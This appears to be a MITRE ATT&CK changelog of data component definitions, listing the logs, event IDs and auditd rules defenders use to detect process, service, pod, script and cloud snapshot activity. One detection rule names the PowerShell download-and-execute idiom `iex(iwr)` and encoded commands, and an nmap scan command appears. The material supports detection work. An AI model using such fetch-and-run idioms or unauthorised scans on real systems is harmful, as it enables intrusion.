- Cloud & SaaS Traffic Collection
  - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.
  - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Flow
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:20.168Z |
description | Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) | Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.
*Data Collection Measures:*
- Network Flow Logs (Metadata Collection)
  - NetFlow
    - Summarized metadata for network conversations (no packet payloads).
  - sFlow (Sampled Flow Logging)
    - Captures sampled packets from switches and routers.
    - Used for real-time traffic monitoring and anomaly detection.
  - Zeek (Bro) Flow Logs
    - Zeek logs session-level details in logs like conn.log, http.log, dns.log, etc.
- Host-Based Collection
  - Sysmon Event ID 3 – Network Connection Initiated
    - Logs process-level network activity, useful for detecting malicious outbound connections.
  - AuditD (Linux) – syscall=connect
    - Monitors system calls for network connections. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Flow Monitoring
  - AWS VPC Flow Logs
    - Captures metadata for traffic between EC2 instances, security groups, and internet gateways.
  - Azure NSG Flow Logs / Google VPC Flow Logs
    - Logs ingress/egress traffic for cloud-based resources. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: OS API Execution
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21T15:41:36.287Z | 2025-04-18T15:10:31.145Z |
description | Operating system function/method calls executed by a process | Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
  - Leverage tools to monitor API execution behaviors at the process level.
  - Example: Sysmon Event ID 10 captures API call traces for process access and memory allocation.
- Process Monitor (ProcMon):
  - Use ProcMon to collect detailed logs of process and API activity. ProcMon can provide granular details on API usage and identify malicious behavior during analysis.
- Windows Event Logs:
  - Use Event IDs from Windows logs for specific API-related activities:
    - Event ID 4688: A new process has been created (can indirectly infer API use).
    - Event ID 4657: A registry value has been modified (to monitor registry-altering APIs).
- Dynamic Analysis Tools:
  - Tools like Cuckoo Sandbox, Flare VM, or Hybrid Analysis monitor API execution during malware detonation.
- Host-Based Logs:
  - On Linux/macOS systems, leverage audit frameworks (e.g., `auditd`, `strace`) to capture and analyze system call usage that APIs map to.
- Runtime Monitors:
  - Runtime security tools like Falco can monitor system-level calls for API execution.
- Debugging and Tracing:
  - Use debugging tools like gdb (Linux) or WinDbg (Windows) for deep tracing of API executions in real time. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Domain Name: Passive DNS
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:16:31.390Z |
description | Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS) | "Domain Name: Passive DNS" captures logged historical and real-time domain name system (DNS) data. This includes records of domain-to-IP address resolutions over time, enabling analysts to track the evolution of domain infrastructure, uncover historical patterns of use, and detect malicious activities tied to domains and their associated IP addresses. Examples:
- Historical Resolutions
- Shared IP Usage
- Temporal Patterns
- Malicious Domain Clustering
- Historical Lookback
This data component can be collected through the following measures:
- Passive DNS Platforms: Use platforms that specialize in passive DNS collection and analysis:
  - Tools: Farsight DNSDB, RiskIQ PassiveTotal, PassiveDNS.
- Threat Intelligence Feeds: Integrate passive DNS data from commercial or open-source threat intelligence providers.
- Custom DNS Collectors: Deploy custom tools to capture DNS traffic at the network level for analysis.
- Cloud DNS Services: Leverage cloud DNS services (e.g., AWS Route 53, Azure DNS) that maintain DNS query logs. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Pod: Pod Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:17:38.124Z |
description | Initial construction of a new pod (ex: kubectl apply|run) | The initial deployment or instantiation of a new pod in a containerized environment. This includes creating a pod manually, through orchestration tools (Kubernetes), or via Infrastructure-as-Code (IaC) configurations. A Pod is the smallest deployable unit in Kubernetes, typically containing one or more containers. Creation methods include:
- Direct pod deployment (`kubectl run`, `kubectl apply`)
- Automated deployment via CI/CD pipelines (e.g., ArgoCD, Jenkins, GitOps)
- Infrastructure-as-Code (IaC) templates (e.g., Terraform, Helm Charts)
- API-based deployments via Kubernetes control plane (create_pod API calls)
- Pods can be ephemeral (short-lived) or persistent (part of a StatefulSet or Deployment).
*Data Collection Measures:*
- Kubernetes Audit Logs
  - Captures all API requests, including pod `create` events.
- Kube-api server Logs
  - Monitors API calls related to pod deployments and modifications. Related Events: `PodSandboxChanged`, `SyncLoop`, `Created pod`
- Container Runtime Logs
  - Logs from CRI-O, containerd, or Docker capture pod creation events. Related Events: `container start`, `container create`
- Cloud Provider Logs
  - GKE, EKS, AKS logs provide insights into Kubernetes API interactions.
- SIEM & Log Aggregation
  - Integrates Kubernetes logs into SIEM solutions.
- EDR/XDR Solutions
  - Monitors container-based activity for anomalous pod creations. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Pod: Pod Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:17:31.773Z |
description | An extracted list of pods within a cluster (ex: kubectl get pods) | Extracting a list of running or existing pods within a containerized cluster environment. Pods are the smallest deployable units in a Kubernetes cluster and typically represent an application or workload. Enumeration of pods provides insight into the structure and state of applications running in the cluster, such as the names of pods, their namespaces, and their associated metadata.
*Data Collection Measures:*
- Kubernetes API Server Audit Logs:
  - Enable Audit Logging in Kubernetes to capture API requests, such as GET `/api/v1/pods`.
- Container Runtime Logs:
  - Collect runtime-level logs from tools like CRI-O, containerd, or Docker, which might show relevant API calls for pod enumeration.
- EDR and SIEM:
  - Endpoint Detection and Response (EDR) tools, if configured with cluster-level visibility, can monitor user commands like `kubectl get pods`.
  - SIEM platforms (e.g., Splunk) can ingest Kubernetes API logs to detect enumeration patterns.
- Host-Based Monitoring:
  - Monitor processes and commands executed on nodes where `kubectl` is installed using tools like auditd, Sysmon for Linux, or kernel modules. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Pod: Pod Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:17:41.365Z |
description | Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit) | Changes made to a pod’s configuration or control data within a containerized cluster. This can include updating settings such as resource limits, environment variables, annotations, labels, or even the containers running within the pod. Pod modifications are often executed using commands like kubectl set, kubectl patch, or kubectl edit.
*Data Collection Measures:*
- Kubernetes API Server Audit Logs:
  - Capture all API calls related to pod modification, such as PATCH, PUT, or UPDATE methods on v1/pods.
- Runtime Security Tools:
  - Tools like Falco, Sysdig, and Kube-bench can monitor pod modifications at runtime and alert on policy violations.
- Container Orchestration Logs:
  - Monitor events logged by Kubernetes itself (e.g., `kubectl logs -n kube-system kube-controller-manager`).
- SIEM and EDR Solutions:
  - Use SIEM platforms (e.g., Splunk) to aggregate API server logs and detect patterns of unauthorized or suspicious pod modifications.
  - Endpoint Detection and Response (EDR) tools configured with container visibility can monitor commands like `kubectl set` or `kubectl patch`.
- Host-Based Monitoring:
  - Collect and analyze logs for processes executing `kubectl` commands or interacting with Kubernetes configuration files (e.g., `.kube/config`). |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:47.199Z |
description | Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10) | Refers to an event where one process attempts to open another process, typically to inspect or manipulate its memory, access handles, or modify execution flow. Monitoring these access attempts can provide valuable insight into both benign and malicious behaviors, such as debugging, inter-process communication (IPC), or process injection.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
  - EDR solutions that provide telemetry on inter-process access and memory manipulation.
- Sysmon (Windows):
  - Event ID 10: Captures process access attempts, including:
    - Source process (initiator)
    - Target process (victim)
    - Access rights requested
    - Process ID correlation
- Windows Event Logs:
  - Event ID 4656 (Audit Handle to an Object): Logs access attempts to system objects.
  - Event ID 4690 (Attempted Process Modification): Can help identify unauthorized process changes.
- Linux/macOS Monitoring:
  - AuditD: Monitors process access through syscall tracing (e.g., `ptrace`, `open`, `read`, `write`).
  - eBPF/XDP: Used for low-level monitoring of kernel process access.
  - OSQuery: Query process access behavior via structured SQL-like logging.
- Procmon (Process Monitor) and Debugging Tools:
  - Windows Procmon: Captures real-time process interactions.
  - Linux strace / ptrace: Useful for tracking process behavior at the system call level. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:15:56.932Z | 2025-04-18T15:10:27.797Z |
description | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) | Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs provide process telemetry, tracking execution flows and arguments.
- Windows Event Logs:
- Event ID 4688 (Audit Process Creation): Captures process creation with associated parent process.
- Sysmon (Windows):
- Event ID 1 (Process Creation): Provides detailed logging
- Linux/macOS Monitoring:
- AuditD (execve syscall): Logs process creation.
- eBPF/XDP: Used for low-level monitoring of system calls related to process execution.
- OSQuery: Allows SQL-like queries to track process events (process_events table).
- Apple Endpoint Security Framework (ESF): Monitors process creation on macOS.
- Network-Based Monitoring:
- Zeek (Bro) Logs: Captures network-based process execution related to remote shells.
- Syslog/OSSEC: Tracks execution of processes on distributed systems.
- Behavioral SIEM Rules:
- Monitor process creation for uncommon binaries in user directories.
- Detect processes with suspicious command-line arguments. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:43.915Z |
description | Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8) | Changes made to a running process, such as writing data into memory, modifying execution behavior, or injecting code into an existing process. Adversaries frequently modify processes to execute malicious payloads, evade detection, or gain escalated privileges.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs can monitor memory modifications and API-level calls.
- Sysmon (Windows):
- Event ID 8 (CreateRemoteThread) – Detects cross-process thread injection, commonly used in process hollowing.
- Event ID 10 (Process Access) – Detects access attempts to another process, often preceding injection attempts.
- Linux/macOS Monitoring:
- AuditD (ptrace, mmap, mprotect syscalls): Detects memory modifications and debugging attempts.
- eBPF/XDP: Monitors low-level system calls related to process modifications.
- OSQuery: The processes table can be queried for unusual modifications.
- Network-Based Monitoring:
- Zeek (Bro) Logs: Captures lateral movement attempts where adversaries remotely modify a process.
- Syslog/OSSEC: Monitors logs for suspicious modifications. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Termination
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:34.519Z |
description | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) | The exit or termination of a running process on a system. This can occur due to normal operations, user-initiated commands, or malicious actions such as process termination by malware to disable security controls.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Monitor process termination events.
- Windows Event Logs:
- Event ID 4689 (Process Termination) – Captures when a process exits, including process ID and parent process.
- Event ID 7036 (Service Control Manager) – Monitors system service stops.
- Sysmon (Windows):
- Event ID 5 (Process Termination) – Detects when a process exits, including parent-child relationships.
- Linux/macOS Monitoring:
- AuditD (`execve`, `exit_group`, `kill` syscalls) – Captures process termination via command-line interactions.
- eBPF/XDP: Monitors low-level system calls related to process termination.
- OSQuery: The processes table can be queried for abnormal exits. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Internet Scan: Response Content
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:13:36.394Z |
description | Logged network traffic in response to a scan showing both protocol header and body values | Captured network traffic that provides details about responses received during an internet scan. This data includes both protocol header values (e.g., HTTP status codes, IP headers, or DNS response codes) and response body content (e.g., HTML, JSON, or raw data). Examples:
- HTTP Scan: A web server responds to a probe with an HTTP 200 status code and an HTML body indicating the default page is accessible.
- DNS Scan: A DNS server replies to a query with a resolved IP address for a domain, along with details like Time-To-Live (TTL) and authoritative information.
- TCP Banner Grab: A service listening on a port (e.g., SSH or FTP) responds with a banner containing service name, version, or other metadata.
*Data Collection Measures:*
- Network Traffic Monitoring:
- Deploy packet capture tools like Wireshark, tcpdump, or Suricata to log both headers and body content of response traffic.
- Use network appliances like firewalls, intrusion detection systems (IDS), or intrusion prevention systems (IPS) with logging enabled to capture scan responses.
- Cloud Logging Services:
- AWS VPC Flow Logs: Capture metadata about network flows, including source and destination, protocol, and response codes.
- GCP Packet Mirroring: Use mirrored packets to analyze responses.
- Azure NSG Flow Logs: Record network traffic flow information for analysis.
- Specific Tools:
- Zmap or Masscan: Can perform internet-wide scans and collect response content for analysis.
- Nmap: Use custom scripts to capture and log detailed response data during scans. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Internet Scan: Response Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:13:39.602Z |
description | Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports | Contextual information about an Internet-facing resource collected during a scan, including details such as open ports, running services, protocols, and versions. This metadata is typically derived from interpreting scan results and helps build a profile of the targeted system. Examples:
- Port and Service Details:
- Open ports (e.g., 22, 80, 443).
- Identified services running on those ports (e.g., SSH, HTTP, HTTPS).
- Service Versions: Detected software version information (e.g., Apache 2.4.41, OpenSSH 8.2).
- Operating System Information: OS fingerprinting data (e.g., Linux Kernel 5.4.0).
- TLS/SSL Certificate Data: Information about the TLS/SSL certificate, such as the expiration date, issuer, and cipher suites.
*Data Collection Measures:*
- Scanning Tools:
- Nmap: Collects port, service, and version information using commands like `nmap -sV <IP>`.
- Masscan: High-speed scanning tool for discovering open ports and active services.
- Zmap: Focused on large-scale Internet scanning, collecting metadata about discovered services.
- Shodan API: Retrieves scan metadata for publicly exposed devices and services.
- Network Logs:
- Use logs from firewalls, intrusion detection systems (IDS), or intrusion prevention systems (IPS) to gather metadata from scan attempts. Example: Zeek or Suricata logs for incoming scan traffic.
- OSINT Platforms: Platforms like Censys, GreyNoise, or Shodan provide aggregated metadata about Internet-facing resources.
- Cloud Metadata Services: AWS Security Hub, Azure Monitor, or GCP Security Command Center can collect and centralize scan-related metadata for Internet-facing resources in cloud environments. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:43.635Z |
description | Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs) | The establishment of a task or job that will execute at a predefined time or based on specific triggers.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 4698 (Scheduled Task Created) – Detects the creation of new scheduled tasks.
- Event ID 4702 (Scheduled Task Updated) – Identifies modifications to existing scheduled jobs.
- Event ID 106 (TaskScheduler Operational Log) – Provides details about scheduled task execution.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Detects the execution of suspicious tasks started by `schtasks.exe`, `at.exe`, or `taskeng.exe`.
- Linux/macOS Monitoring:
- AuditD: Monitor modifications to `/etc/cron*`, `/var/spool/cron/`, and `crontab` files.
- Syslog: Capture cron job execution logs from `/var/log/cron`.
- OSQuery: Query the `crontab` and `launchd` tables for scheduled job configurations.
- Endpoint Detection and Response (EDR) Tools:
- Track scheduled task creation and modification events.
- SIEM & XDR Detection Rules:
- Monitor for scheduled jobs created by unusual users.
- Detect tasks executing scripts from non-standard directories. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Script: Script Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:16:55.269Z | 2025-04-18T15:12:46.164Z |
description | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) | The execution of a text file that contains code via the interpreter.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
- Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (`powershell.exe`, `wscript.exe`, `cscript.exe`).
- Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
- Event ID 11 (File Creation) – Detects new script files written to disk before execution.
- Endpoint Detection and Response (EDR) Tools:
- Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
- PowerShell Logging:
- Enable Module Logging: Logs all loaded modules and cmdlets.
- Enable Script Block Logging: Captures complete PowerShell script execution history.
- SIEM Detection Rules:
- Detect script execution with obfuscated, encoded, or remote URLs.
- Alert on script executions using `-EncodedCommand` or `iex(iwr)`. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:54.408Z |
description | Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs) | The registration of a new service or daemon on an operating system.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4697 - Captures the creation of a new Windows service.
- Event ID 7045 - Captures services installed by administrators or adversaries.
- Event ID 7034 - Could indicate malicious service modification or exploitation.
- Sysmon Logs
- Sysmon Event ID 1 - Process Creation (captures service executables).
- Sysmon Event ID 4 - Service state changes (detects service installation).
- Sysmon Event ID 13 - Registry modifications (captures service persistence changes).
- PowerShell Logging
- Monitor `New-Service` and `Set-Service` PowerShell cmdlets in Event ID 4104 (Script Block Logging).
- Linux/macOS Collection Methods
- AuditD & Syslog Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`)
- AuditD Rules:
- `auditctl -w /etc/systemd/system -p wa -k service_creation`
- Detects changes to `systemd` service configurations.
- Systemd Journals (`journalctl -u <service_name>`)
- Captures newly created systemd services.
- LaunchDaemons & LaunchAgents (macOS)
- Monitor `/Library/LaunchDaemons/` and `/Library/LaunchAgents/` for new plist files. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:57.700Z |
description | Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs) | Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 7040 - Detects modifications to the startup behavior of a service.
- Event ID 7045 - Can capture changes made to existing services.
- Event ID 7036 - Tracks when services start or stop, potentially indicating malicious tampering.
- Event ID 4697 - Can detect when an adversary reinstalls a service with different parameters.
- Sysmon Logs
- Sysmon Event ID 13 - Detects changes to service configurations in the Windows Registry (e.g., `HKLM\SYSTEM\CurrentControlSet\Services\`).
- Sysmon Event ID 1 - Can track execution of `sc.exe` or `PowerShell Set-Service`.
- PowerShell Logging
- Event ID 4104 (Script Block Logging) - Captures execution of commands like `Set-Service`, `New-Service`, or `sc config`.
- Command-Line Logging (Event ID 4688) - Tracks usage of service modification commands:
- `sc config <service_name> start= auto`
- `sc qc <service_name>`
- Linux/macOS Collection Methods
- Systemd Journals (`journalctl -u <service_name>`) Tracks modifications to systemd service configurations.
- Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`) Captures changes to service state and execution parameters.
- AuditD Rules for Service Modification
- Monitor modifications to `/etc/systemd/system/` for new or altered service unit files: `auditctl -w /etc/systemd/system/ -p wa -k service_modification`
- Track execution of `systemctl` or `service` commands: `auditctl -a always,exit -F arch=b64 -S execve -F a0=systemctl -F key=service_mod`
- OSQuery for Linux/macOS Monitoring
- Query modified services using OSQuery’s `processes` or `system_info` tables: `SELECT * FROM systemd_units WHERE state != 'running';`
- macOS Launch Daemon/Agent Modification
- Monitor for changes in:
- `/Library/LaunchDaemons/`
- `/Library/LaunchAgents/`
- Track modifications to `.plist` files indicating persistence attempts. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:08.504Z |
description | Initial construction of a new snapshot (ex: AWS create-snapshot) | The process of taking a point-in-time copy of a cloud storage volume (files, settings, configurations, etc.), virtual machine (VM), or database that can be created and deployed in cloud environments.
*Data Collection Measures:*
- Cloud Platform Logs (IaaS)
- AWS CloudTrail Logs: Monitor API calls related to snapshot creation (`CreateSnapshot`).
- Azure Monitor Logs: Track snapshot creation (`Microsoft.Compute/snapshots/write`).
- Google Cloud Logging: Detect `compute.disks.createSnapshot`. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:05.200Z |
description | Removal of a snapshot (ex: AWS delete-snapshot) | The removal of a point-in-time backup of a cloud storage volume, virtual machine (VM), or database.
*Data Collection Measures:*
- AWS CloudTrail
- Logs `DeleteSnapshot` API calls in EC2, RDS, and EBS services.
- Azure Monitor Logs
- Tracks snapshot deletions via `Microsoft.Compute/snapshots/delete` API calls.
- Google Cloud Logging
- Detects snapshot removal through `compute.disks.deleteSnapshot` events. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:18.124Z |
description | An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots) | The process of listing or retrieving metadata about existing snapshots in a cloud environment.
*Data Collection Measures:*
- AWS CloudTrail
- Logs API calls such as `DescribeSnapshots`, `ListSnapshots`, and `GetSnapshotAttributes`.
- Azure Monitor Logs
- Tracks snapshot enumeration via `Microsoft.Compute/snapshots/read`.
- Google Cloud Logging
- Detects snapshot listing through `compute.disks.listSnapshots`.
|
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:11.682Z |
description | Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute) | Changes made to a cloud snapshot's metadata, attributes, or control settings. These modifications may involve adjusting access permissions, changing retention policies, or altering encryption settings.
*Data Collection Measures:*
- AWS CloudTrail
- Tracks API calls such as `ModifySnapshotAttribute`, `ResetSnapshotAttribute`, and `ModifySnapshotTier`.
- Azure Monitor Logs
- Logs changes via `Microsoft.Compute/snapshots/write`.
- Google Cloud Logging
- Captures modifications through `compute.snapshots.setIamPolicy` and `compute.snapshots.patch`. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Persona: Social Media
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:16:50.453Z |
description | Established, compromised, or otherwise acquired social media personas | Established, compromised, or otherwise acquired by adversaries to conduct reconnaissance, influence operations, social engineering, or other cyber threats.
*Data Collection Measures:*
- API Monitoring
- Social media APIs (e.g., Twitter API, Facebook Graph API) can extract behavioral patterns of accounts.
- Web Scraping
- Extracts public profile data, friend lists, or interactions to identify impersonation attempts.
